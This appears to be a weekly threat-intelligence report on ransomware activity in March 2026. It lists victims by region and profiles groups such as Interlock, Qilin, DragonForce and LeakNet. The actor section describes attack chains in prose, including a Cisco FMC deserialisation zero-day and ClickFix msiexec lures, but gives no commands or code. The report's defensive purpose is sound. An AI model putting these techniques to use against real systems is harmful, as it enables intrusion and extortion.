Executive Summary
The week of March 13–20, 2026, was defined by a major zero-day disclosure: Amazon’s threat intelligence team and security researchers publicly confirmed that the Interlock ransomware gang had been exploiting CVE-2026-20131, a maximum-severity (CVSS 10.0) remote code execution flaw in Cisco Secure Firewall Management Center, as a zero-day since January 26 — 36 days before Cisco disclosed it on March 4. CISA ordered federal agencies to patch by March 22 and issued a broader advisory urging all organisations running Cisco FMC to review indicators of compromise immediately. The number of Interlock victims compromised during the zero-day window remains unknown but is expected to be significant given the prevalence of Cisco firewalls in enterprise environments.
On the operational front, Ransom-DB tracked 177 successful ransomware attacks in the week ending March 17, a slight contraction from 211 the previous week. Qilin dominated with 30 confirmed victims (17% of all activity), followed by Akira with 18 and emerging groups CoinbaseCartel (12) and CipherForce (11). Medusa continued its aggressive targeting of US municipalities and healthcare, claiming Henry County, Illinois, and adding to its growing list of government victims. DragonForce sustained a prolific pace across the UK, US, and South Africa, while LeakNet adopted ClickFix social engineering delivered through compromised legitimate websites — a significant tactical evolution that removes the group’s dependence on initial access brokers and signals its intent to scale operations rapidly.
In healthcare, the Payload ransomware group claimed Royal Bahrain Hospital with 110 GB of exfiltrated data on a March 23 deadline, and the Cegedim Santé breach in France — affecting 15.8 million administrative medical files from 1,500 doctors — was publicly disclosed as investigations continued. The Namibia Airports Company confirmed a 500 GB data theft by INC Ransom, and Passaic County, New Jersey, disclosed a malware attack that disabled government phone lines and IT systems for its 600,000 residents.
Key Statistics:
- Global: 177 ransomware attacks tracked in the week ending March 17; Interlock zero-day (CVE-2026-20131) exploited since January; LeakNet adopts ClickFix social engineering; Europol’s Operation Alice took down 373,000 dark-web sites
- Europe: 5+ incidents — DragonForce claimed Liverpool Philharmonic and Salford City College (UK); Akira posted Motorpal (Czech Republic) and bdtronic (Germany); Cegedim Santé breach disclosed affecting 15.8M French medical records
- Asia: 2+ incidents — Payload claimed Royal Bahrain Hospital (110 GB); The Gentlemen targeted Chase Asia in Thailand
- US: 10+ incidents — Medusa claimed Henry County, IL ($500K demand); Passaic County, NJ malware attack; DragonForce listed Mercedes-Benz of Arlington, Oriska Insurance, and multiple SMBs; CoinbaseCartel posted Augenomics and Neochromosome; Navia Benefit Solutions disclosed 2.7M-person breach
- Other: INC Ransom claimed Namibia Airports Company (500 GB); DragonForce listed The Unlimited (South Africa)
1. EUROPE
1.1 Government
No new government-sector ransomware incidents were confirmed in Europe during this reporting period.
1.2 Health, Municipalities & Non-commercial
The Cegedim Santé data breach continued to dominate European healthcare security discussions after the French health ministry announced that approximately 15.8 million administrative medical files had been stolen from the company’s MonLogicielMedical software platform. Cegedim Santé, a healthcare software vendor used by some 3,800 doctors in France, confirmed that 1,500 of those practices were affected. While the breach was initially detected in late 2025, its full scope became public in early March 2026, and notification to affected individuals began on March 18. The exfiltrated data includes patient names, gender, dates of birth, contact information, and administrative comments, with approximately 165,000 files containing clinical notes that in “very limited cases” referenced sensitive conditions including HIV/AIDS status. French broadcaster France 24 reported that top politicians were among those affected. This is the largest healthcare data breach in French history and has drawn scrutiny from the CNIL.
DragonForce claimed Salford City College, one of the largest further education providers in Greater Manchester, UK, on March 6, with the data publication deadline falling within the week 12 reporting window. The group threatened to release 256.92 GB of organisational data including confidential mental health assessment forms, spreadsheets containing personal information, and internal administrative documents. Salford City College serves thousands of students across multiple campuses, and the exposure of mental health records makes this breach particularly sensitive.
DragonForce also listed Liverpool Philharmonic Hall (liverpoolphil.com) on March 20, a prominent concert and events venue in Liverpool, UK. Details of the scope of the breach remain limited, but the listing continues DragonForce’s pattern of targeting cultural and non-commercial institutions across the United Kingdom.
1.3 Business
Akira posted Motorpal on March 20, a prominent Czech manufacturer of diesel injection systems established in 1946. The group claims access to 31 GB of internal files including employee personal information, HR data, financial records, partner files, contracts, and project documentation. Motorpal is a significant employer in the Czech Republic and supplies fuel injection components to European and global automotive markets.
Akira simultaneously listed bdtronic, a German manufacturing company that provides dispensing, impregnation, hot riveting, and plasma application solutions to the automotive, electronics, telecommunications, and renewable energy industries. The attackers claim to have exfiltrated 40 GB of corporate data including employee personal information such as passports and driving licences, HR files, financial documents, and — notably — SpaceX project files, along with partner files and contracts.
2. ASIA
2.1 Government
No government-sector ransomware incidents were confirmed in Asia during this reporting period.
2.2 Health, Municipalities & Non-commercial
The Payload ransomware group announced on March 15 that it had compromised Royal Bahrain Hospital, a prominent 70-bed healthcare facility in Bahrain. The attackers claim to have exfiltrated 110 GB of sensitive data, which they displayed on their Tor-based leak site as proof of the breach. Payload set a March 23 deadline, threatening to release the stolen data — presumably including patient medical records and administrative information — if the ransom is not paid. The attack underscores the continued vulnerability of healthcare facilities in the Gulf region to ransomware operations.
2.3 Business
The Gentlemen ransomware group claimed responsibility on March 16 for a cyberattack against Chase Asia (chase.co.th), a prominent debt collection and non-performing loan management company in Thailand. Chase Asia handles sensitive financial data on behalf of banks and lending institutions across the Thai market, making the exfiltration of client data a significant concern for the broader financial services ecosystem in Southeast Asia. The Gentlemen, which emerged as one of the most operationally mature ransomware operations of 2025, uses dual-extortion tactics combining data theft with file encryption.
CoinbaseCartel posted Novogene, a genomics and bioinformatics company operating in China, on March 15. CoinbaseCartel specialises exclusively in data exfiltration — their operations never involve system encryption — making the stolen genomic and research data particularly concerning given the sensitivity of the information.
3. UNITED STATES
3.1 Government
Henry County, Illinois, disclosed a ransomware attack on March 18 that shut down access to multiple county systems. The county’s incident response team engaged an outside firm and notified multiple law enforcement and government cybersecurity agencies. While 911 and emergency dispatch services remained operational, administrative functions were severely impacted. The Medusa ransomware gang claimed the attack on March 20, giving the county eight days to pay a $500,000 ransom. Henry County has a population of approximately 50,000 and is located about two hours from Cedar Rapids, Iowa. In a separate incident approximately 30 minutes from the county seat, Monmouth College also announced a ransomware attack that had occurred during the holiday season.
Passaic County, New Jersey, announced on March 5 that a malware attack had disabled its IT systems and phone lines, with recovery efforts continuing through mid-March. The county, home to nearly 600,000 people in Northern New Jersey, confirmed it was working with federal and state officials to investigate and contain the incident. The New Jersey Department of Homeland Security confirmed it was actively supporting recovery efforts. County officials noted that several other local governments in New Jersey had experienced similar incidents, reflecting a broader trend of cybercriminal operations pivoting from major metropolitan targets to smaller municipalities in 2026.
3.2 Health, Municipalities & Non-commercial
Navia Benefit Solutions disclosed a data breach affecting approximately 2.7 million individuals after detecting suspicious activity on January 23, 2026. Investigators determined that an unauthorised actor had accessed systems between December 22, 2025, and January 15, 2026. The compromised data includes names, email addresses, phone numbers, dates of birth, Social Security numbers, and benefits-related information including HRA participation, FSA details, and COBRA enrolment data. Breach notifications began mailing on March 18, and Navia is offering 12 months of complimentary identity protection through Kroll. While no ransomware group has claimed the attack, the scale of data exposure makes this one of the largest US healthcare-adjacent breaches disclosed during the week.
CoinbaseCartel posted Augenomics, a healthcare technology company based in the US, on March 15. The data-exfiltration-only group claimed access to corporate and patient-related information. On the same day, CoinbaseCartel also listed Neochromosome, a US-based company, extending the group’s focus on biotechnology and health-adjacent targets.
3.3 Business
DragonForce was exceptionally active against US businesses during the week. The group claimed Mercedes-Benz of Arlington on March 20, a leading car dealership, threatening to leak sensitive data unless negotiations begin. DragonForce also listed Oriska Insurance, a US-based insurer serving small and minority-owned businesses with surety bonding, workers’ compensation, and health coverage, threatening to exfiltrate and publish client data and disrupt claims processing. Additional US victims claimed by DragonForce during the week include The Farese Group (a retirement planning firm), Edifice Design + Architecture, Construction Equipment Parts in heavy machinery, Centre Concrete in central Pennsylvania, and Conrad Capital Management, an investment advisory firm. The breadth of these claims — spanning automotive, insurance, financial services, construction, and manufacturing — illustrates DragonForce’s opportunistic approach to mid-market US businesses.
Sopower, an industrial electrical service company based in Louisiana offering electrical testing, commissioning, and substation services, was also listed by DragonForce.
CoinbaseCartel posted Tecnocap Group on March 19, a packaging and manufacturing company, along with ATG on March 15, continuing the group’s rapid pace of data-exfiltration claims against US businesses.
4. REST OF WORLD
4.1 Government
The Namibia Airports Company (NAC) confirmed on March 19 that it had fallen victim to a cyberattack by the INC Ransomware Group. The attackers claim to have stolen 500 GB of sensitive data including financial records, human resources information, and customer details. The Communications Regulatory Authority of Namibia (CRAN) confirmed the breach was carried out by INC Ransom and stated that none of the alleged data had been published to date, though the group’s countdown timer threatens eventual release. NAC stated that operations across all its facilities remain fully functional despite the breach. This marks the second INC Ransom attack in Namibia, following a 2025 breach of the Otjiwarongo Municipality, suggesting a sustained campaign against Namibian public infrastructure.
4.2 Health, Municipalities & Non-commercial
No incidents reported in this category this week.
4.3 Business
DragonForce listed The Unlimited (theunlimited.co.za), a South African financial services provider offering insurance products including health, auto, legal, and life insurance. The claim extends DragonForce’s reach into the African continent, a region that has seen increasing ransomware activity in 2026 as threat actors probe markets with potentially weaker cyber defences and incident response capabilities.
5. THREAT ACTOR ACTIVITY
Interlock dominated the threat intelligence narrative this week as researchers confirmed the group had been exploiting CVE-2026-20131 in Cisco Secure Firewall Management Center since January 26, 2026 — 36 days before the vulnerability was publicly disclosed on March 4. The flaw, rated CVSS 10.0, stems from insecure deserialisation of user-supplied Java byte streams and allows unauthenticated remote code execution as root. Amazon’s MadPot honeypot network detected the campaign and helped identify the attack chain: crafted HTTP requests to a specific FMC path trigger arbitrary Java code execution, after which the compromised system sends an HTTP PUT request to an external server to confirm exploitation, before fetching an ELF binary hosting additional Interlock tooling. CISA ordered federal agencies to patch by March 22 and issued a broader advisory urging immediate remediation. Interlock’s previous victims include DaVita, Kettering Health, Texas Tech University, and the city of Saint Paul, Minnesota.
Qilin continued as the most prolific ransomware operation globally with 30 confirmed victims in the week ending March 17, representing nearly 17% of all tracked activity. The group’s Rust-based encryption and sophisticated double-extortion tactics have made it the dominant force in 2026, with over 200 victims claimed so far this year.
LeakNet made headlines by adopting ClickFix social engineering, delivered through compromised legitimate websites, as a newly confirmed initial access method. Victims encounter fake CAPTCHA verification checks on legitimate-but-compromised sites instructing them to copy and paste a msiexec.exe command into the Windows Run dialog. The payload is loaded using the Deno JavaScript runtime as an in-memory loader, evading traditional detection methods. This shift removes LeakNet’s dependence on initial access brokers, enabling the group to scale more rapidly and broadly. While LeakNet currently averages about three victims per month, the tactical evolution signals an intent to accelerate operations significantly.
Medusa maintained aggressive activity, claiming Henry County, Illinois, during the week with a $500,000 demand. A joint FBI/CISA/MS-ISAC advisory issued in March noted that Medusa developers and affiliates have impacted over 300 victims across critical infrastructure sectors.
DragonForce posted the highest volume of individual victim claims during the week, listing targets across the US, UK, and South Africa. The group has recently established a ransomware-as-a-service partnership with both Qilin and LockBit, creating a powerful distribution network. Its victims span automotive dealerships, insurance companies, educational institutions, cultural venues, construction firms, and financial advisory practices — reflecting a deliberately broad, opportunistic targeting strategy.
CoinbaseCartel continued its rise as an emerging threat with 12 victims during the week, including healthcare technology, genomics, and packaging companies. Notably, CoinbaseCartel operates exclusively through data exfiltration without deploying encryption, making detection more difficult as there is no operational disruption to trigger incident response.
6. KEY TAKEAWAYS
The Interlock zero-day exploitation of Cisco FMC underscores that patch windows are continuing to shrink. A 36-day gap between initial exploitation and public disclosure means that any organisation running vulnerable Cisco Secure Firewall Management Center infrastructure may have already been compromised, and retrospective threat hunting using the published indicators of compromise should be treated as urgent. CISA’s advisory to harden endpoint management systems — issued in the wake of both the Stryker/Intune incident (week 11) and the Cisco FMC campaign — reflects a growing recognition that device management platforms are high-value targets for adversaries seeking to maximise impact.
The adoption of ClickFix by LeakNet represents a concerning evolution in ransomware initial access. By delivering lures through legitimate-but-compromised websites rather than attacker-owned infrastructure, LeakNet bypasses many network-layer detection mechanisms. Organisations should consider blocking or monitoring for unexpected msiexec.exe executions initiated from user-accessible contexts and review web proxy logs for known compromised domains.
Medusa’s continued targeting of US municipalities and healthcare — now spanning Mississippi, Illinois, and New Jersey in recent weeks — confirms that smaller government entities remain disproportionately vulnerable. The typical ransom demand of $500,000–$800,000 targets organisations with limited cybersecurity budgets that may struggle to afford both the ransom and the cost of extended recovery.
DragonForce’s sheer volume and breadth of targeting, combined with its ransomware-as-a-service partnerships with Qilin and LockBit, makes it one of the most operationally diverse groups in the current landscape. Organisations across all sectors and sizes should treat DragonForce indicators of compromise as high-priority detections.